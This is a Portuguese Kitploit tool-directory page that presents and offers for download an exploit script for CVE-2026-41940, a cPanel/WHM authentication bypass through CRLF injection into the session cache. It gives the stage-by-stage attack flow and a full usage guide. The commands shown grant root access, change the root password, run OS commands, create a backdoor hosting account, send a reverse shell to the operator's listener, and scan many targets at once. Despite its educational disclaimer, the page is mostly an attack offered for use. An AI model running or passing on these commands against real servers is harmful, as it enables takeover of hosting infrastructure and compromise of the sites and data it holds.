Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41940 — cPanel/WHM Bypass de Autenticação (Vulnerabilidade Zero-Day) | Kitploit
Ferramentas/GitHubGitHub/christian93111/cve-2026-41940
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAutenticaçãoAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

cPanel/WHM Bypass de Autenticação (Vulnerabilidade Zero-Day)

1024há 3 mesesAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41940: Bypass de Autenticação no cPanel/WHM (Alvo Único e Múltiplos Alvos)

Aviso: Este documento e o script associado (exploit.py) são fornecidos estritamente para fins educacionais, pesquisa de segurança e testes de penetração autorizados. Não utilize este software contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.

Visão Geral

exploit.py é um script que demonstra uma vulnerabilidade de bypass de autenticação (CVE-2026-41940) no cPanel & WHM. A vulnerabilidade permite que um atacante não autenticado injete uma sessão root no cache do daemon através de uma falha de injeção CRLF, concedendo acesso root ao WHM sem exigir credenciais válidas.

Análise da Vulnerabilidade e Fluxo do Exploit

O exploit funciona aproveitando uma vulnerabilidade de injeção CRLF (Carriage Return Line Feed) no mecanismo de manipulação de Autenticação Básica, combinada com uma falha de propagação de sessão. O script automatiza o ataque em quatro estágios:

  1. Criação de Sessão Pré-Autenticação: Conecta-se a endpoints públicos de login (ex.: /login/ ou ) para adquirir um cookie de sessão não autenticado de base ().
/cgi/login.cgi
whostmgrsession
  • Injeção CRLF: Envia um cabeçalho de Autenticação Básica personalizado contendo um payload codificado em Base64 que injeta campos de sessão root diretamente no cache de sessão do cpsrvd. A resposta de redirecionamento do servidor vaza o token de segurança gerado (cpsess).
  • Propagação de Sessão: O cookie de sessão bruto é enviado para um endpoint WHM autenticado, acionando do_token_denied para propagar a sessão forjada no cache do daemon — tornando-a uma sessão autenticada válida.
  • Verificação: Acessa endpoints restritos da API WHM (ex.: /json-api/version) usando a sessão forjada para confirmar o acesso root.

  • Pré-requisitos

    • Python 3.x
    • Biblioteca requests
    root@kitploit:~
    pip install requests
    

    Uso

    root@kitploit:~
    python exploit.py --target <URL> [options]
    python exploit.py --target-file <FILE> [options]
    

    Argumentos

    Seleção de Alvo

    ArgumentDescription
    --target URLURL única do WHM (ex.: https://target:2087)
    --target-file FILEArquivo com alvos (um ip:porta por linha) — ativa modo de verificação automaticamente

    Opções de Rede e Núcleo

    ArgumentDescription
    --threads NThreads concorrentes para modo multialvo (padrão: 10)
    --hostname HOSTSobrescreve cabeçalho Host — use quando a descoberta automática falha ou retorna hostname errado
    --timeout NTimeout por requisição em segundos (padrão: 15)
    --retries NNúmero de tentativas em erros de rede (padrão: 3)
    --cookie-name NAMEForça um nome de cookie de sessão específico (detectado automaticamente se omitido)
    --no-verifyPula a verificação do Estágio 4 e prossegue mesmo assim

    Opções de Exploração (Pós-Bypass)

    ArgumentDescription
    --checkModo apenas verificação — verifica vulnerabilidade sem explorar (definido automaticamente com --target-file)
    --password PASSAltera a senha root para PASS
    --api FUNCChama uma função específica da JSON-API do WHM
    --api-params K=V,...Parâmetros separados por vírgula para --api
    --exec CMDExecuta um comando do SO via WHM scripts/run_script (fallback: rawexec)
    --sessionGera uma URL de login root com um clique — abra imediatamente, token expira rápido
    --shellEntra em um shell WHM interativo (apenas alvo único)
    --dumpExibe informações do servidor: versão, contas, zonas DNS, privilégios
    --add-user USER PASS DOMAINCria uma nova conta de hospedagem cPanel
    --revshell LHOST LPORTEnvia um shell reverso bash para seu listener

    Opções de Saída

    ArgumentDescription
    --output FILESalva o token de sessão e detalhes em um arquivo JSON

    Exemplos

    root@kitploit:~
    # Check if target is vulnerable
    python exploit.py --target https://target:2087 --check
    
    # Dump server info (version, accounts, privileges)
    python exploit.py --target https://target:2087 --dump
    
    # Generate a one-click root login URL (paste in browser immediately)
    python exploit.py --target https://target:2087 --session
    
    # Execute a command
    python exploit.py --target https://target:2087 --exec "id"
    
    # Drop into an interactive WHM shell
    python exploit.py --target https://target:2087 --shell
    
    # Change root password
    python exploit.py --target https://target:2087 --password 'NewP@ss!'
    
    # Call WHM API directly
    python exploit.py --target https://target:2087 --api version
    python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1
    
    # Create a backdoor cPanel account
    python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com
    
    # Send reverse shell
    python exploit.py --target https://target:2087 --revshell YOUR_IP 4444
    
    # Override hostname (use when auto-discovery fails)
    python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check
    
    # Scan multiple targets (check-only mode)
    python exploit.py --target-file ips.txt
    python exploit.py --target-file ips.txt --threads 20
    
    # Save session to file
    python exploit.py --target https://target:2087 --dump --output results.json
    

    Comandos do Shell Interativo

    Ao usar --shell, os seguintes comandos estão disponíveis:

    CommandDescription
    api <function> [k=v ...]Chama uma função JSON-API do WHM (ex.: api version)
    exec <command>Executa um comando do SO via WHM (ex.: exec id)
    passwd <newpass>Altera a senha root
    dumpExibe informações do servidor
    revshell <lhost> <lport>Envia um shell reverso
    add <user> <pass> <domain>Cria uma conta cPanel
    save <path>Salva a sessão atual em um arquivo
    exit / quitSai do shell

    Lembrete

    Atualize imediatamente os patches de segurança mais recentes do cPanel/WHM.

    Baixar ferramenta